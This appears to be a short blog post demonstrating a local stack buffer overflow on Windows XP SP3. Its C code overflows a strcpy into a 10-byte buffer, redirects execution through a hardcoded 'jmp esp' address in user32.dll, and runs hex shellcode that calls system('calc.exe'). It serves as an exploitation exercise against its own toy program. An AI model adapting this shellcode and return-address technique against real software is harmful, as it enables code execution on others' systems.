Stack Overflow(strcpy,Local)
XP SP3
void func1(char* s) { char buf[10]; strcpy(buf, s); } int _tmain(int argc, TCHAR* argv[], TCHAR* envp[]) { // unsigned char uc[] = // "\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E" // "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0" // "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50" // "\xB8" // "\xC7\x93\xBF\x77"//system // "\xFF\xD0\x33\xC0\x50\xB8" // "\x7E\x9E\xC0\x77\xFF"//exit // "\xD0"; // char ch[] = "0123456789123456";//integer multiple(4) // DWORD* pEIP = (DWORD*)&ch[12];//retn address, +12 realease,+16 debug // *pEIP = (DWORD)uc;//return address point to ShellCode // func1(ch); unsigned char uc[] = "123456789012\x53\x93\xD2\x77" "\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E" "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0" "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50" "\xB8" "\xC7\x93\xBF\x77"//system "\xFF\xD0\x33\xC0\x50\xB8" "\x7E\x9E\xC0\x77\xFF"//exit "\xD0"; LoadLibrary("user32.dll");//jump esp, 77D29353 need LoadLibrary("user32.dll") func1((char*)uc); return 0; }
posted on 2016-10-28 10:02 NoneButNow 阅读(191) 评论(0) 编辑 收藏 举报